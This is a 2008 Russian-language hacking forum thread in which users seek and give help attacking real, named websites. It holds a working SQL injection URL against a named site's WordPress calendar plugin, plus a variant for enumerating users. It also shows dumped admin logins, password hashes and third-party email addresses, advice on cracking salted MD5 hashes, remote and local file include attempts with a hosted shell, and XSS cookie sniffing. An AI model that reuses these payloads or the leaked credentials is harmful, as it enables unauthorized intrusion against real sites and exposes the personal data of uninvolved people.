Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. WeddRRRyss

    WeddRRRyss Banned

    Joined:
    15 Jan 2008
    Messages:
    33
    Likes Received:
    20
    Reputations:
    4
    Я вот нашел пхп инклуд вот здесь: http://www.dorodango-method.com/index.php а когда пробую залить шелл http://www.dorodango-method.com/index.php?page=http://mysite.ru/shell.php
    Шел отображается нормально, но файлы отображаются те которые у меня на сайте, и команды тоже выполняются относительно моего сайта.. В чем трабл?
     
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    799
    Likes Received:
    710
    Reputations:
    301
    WeddRRRyss там нет инклуда
     
    #882 Constantine, 6 Feb 2008
    Last edited: 6 Feb 2008
  3. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?
     
  4. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Админку и пароли нашел токо ...

    У меня есть полный доступ к FTP одного сайта, я там покавырялся и нашел админку на сайте, путь выглядит так _www.site.ru/AdminSite/start.php , (вот скрин админки ) потом я там в FTP поискал пароли, и в той папке где админка AdminSite есть еще папка tc и там есть файл config.php открыл я этот .php файл вот сам код
    PHP:
    <?
    //Файл: config.php
    //Назначение: хранение настраиваемых переменных
    //===========================================

    error_reporting(0);

    //Начальный хост (адрес начальной папки через HTTP, 
    //например: "http://mysite.ru" или "http:/pupkin.ru/home")
    $host_1 "http://site.ru".$HTTP_HOST;

    //Начальная директория 
    $path_1 $DOCUMENT_ROOT;

    //Имя пользоввателя  (надо поменять!) 
    $login_1 "site";

    //Пароль для входа в программу (надо поменять!) 
    $pass_1 "****";

    //Количество файлов, доступных для загрузки на сервер 
    //(четное число, например: 4, 6, 8 ...)
    $files_to_upload 10;

    ?>
    Ну короче видите там где login и pass

    PHP:
    //Имя пользоввателя  (надо поменять!)  
    $login_1 "site"

    //Пароль для входа в программу (надо поменять!)  
    $pass_1 "****";
    Ввел тут _www.site.ru/AdminSite/start.php как там в config.php логин и пароль и не заходит, менял в config.php логин и пароль токо не фига, может это вообще логин и пароль не от админки? Просто я решил если они находятся в одной папке что это оно)

    Спасибо за внимание

    Если не в том разделе сорри :) (но кажется тот)

    Токо не пинайте pls, если я не понятно обяснил напишите) просто хочу дойти до конца :)
     
    #884 CaNNabi$, 6 Feb 2008
    Last edited: 6 Feb 2008
  5. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    139
    Reputations:
    31
    не очень понятно зачем нужна админка если есть доступ к ftp а так вообще исходник start.php не судьба посмотреть?
     
  6. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    start.php я смотрел там ничего нету), все мне говорят зачем нуна админка если есть доступ к фтп, )

    Ответ: просто для себя хочу узнать) новые знания пригодятся)
     
  7. Conquerstador

    Conquerstador Banned

    Joined:
    7 Jul 2007
    Messages:
    124
    Likes Received:
    39
    Reputations:
    -6
    Мало ли IP привязан к Админу смотри лучше должны же пассы где-то быть не с неба же упали))) ИЩИ!
     
  8. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Вводил пассы от MySQL базы тоже нифига)
     
  9. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Я первый раз занимаюсь SQL инекцией :)
    Вот подскажите это SQL инекция или нет? По моему да, токо хочу узнать на 100% :)

    HTML:
    http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php? id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email), 3,4,5,6%20from%20wp_users--

    и там вот это потом написано

    Edit event admin:cd59cc41aa03d53c9336522d40ee4339:bradley@riseup.net

    cd59cc41aa03d53c9336522d40ee4339 это кажется MD5, если я не ошибаюсь)

    Это моя первая тема про SQL так что не пинайте)

    Спасибо за внимание
     
    #889 CaNNabi$, 7 Feb 2008
    Last edited: 7 Feb 2008
    1 person likes this.
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    CaNNabi$, да инъекция ))) Можешь юзать лимит, что бы посмотреть инфу по остальным юзерам

    http://brownberets.info/wp-content/plugins/wp-cal/functions/editevent.php?id=-1+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6+from+wp_users+limit+1,1--
     
    2 people like this.
  11. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Спасибо что подсказал, наконец то сбылась моя мечта, я так рад ппц как) давно хотел узнать хотел сделать SQL инекцию, ааа ништяк)
    Терь моно в раздел SQL инекций добавлять)
     
    #891 CaNNabi$, 7 Feb 2008
    Last edited: 7 Feb 2008
    1 person likes this.
  12. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    А вот это нуно рашифровать cd59cc41aa03d53c9336522d40ee4339 и я получу пароль от админки? Или как?)

    Повторяю я новичок в этом деле :)
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    угу, от админки ворд пресса
     
  14. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    у меня такая ситуация:
    index.php?d=files&p=../index
    инклудится индекс. Видно, что добавляется .php в конец.
    index.php?d=files&p=../index.php%00
    index.php?d=files&p=../index.php?
    index.php?d=files&p=../index.php//
    не прокатывает! Ошибку выдёт. Там Винда стоит.
    Есть ли шанс приишклудить файл с другим расширением, отличным от php?
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    скорее всего нет, ибо magic_quotes или просто фильр стоит, попробуй объявить переменную через куки или постом, хотя навряд ли прокатит
     
  16. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    и выводится вот такой вид хешёй немогу понять что это именно мд5 или всё таки соль?

    Weinstein:425207c6e60ffa47065702619d9a8e76:aa:happiquilter@verizon.net

    Fisher:6ab6348c5cb2b47c1afdb254d23f6717:f2:bizzybeadz@gmail.com
     
  17. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    это md5($pass.$sault), брутил PasswordPro, сбрутил тока 2 пасса =/
     
    2 people like this.
  18. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    точно ты уверен ?
     
  19. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Сбруть этот: 72baa9d520b127dd4ab03ff904cc1959:e5 и поймешь =)
    хотя опять же 100% уверенности всё же дать не могу
     
  20. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    Может кто-нибудь все-таки подскажет: Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?
     
Loading...
Thread Status:
Not open for further replies.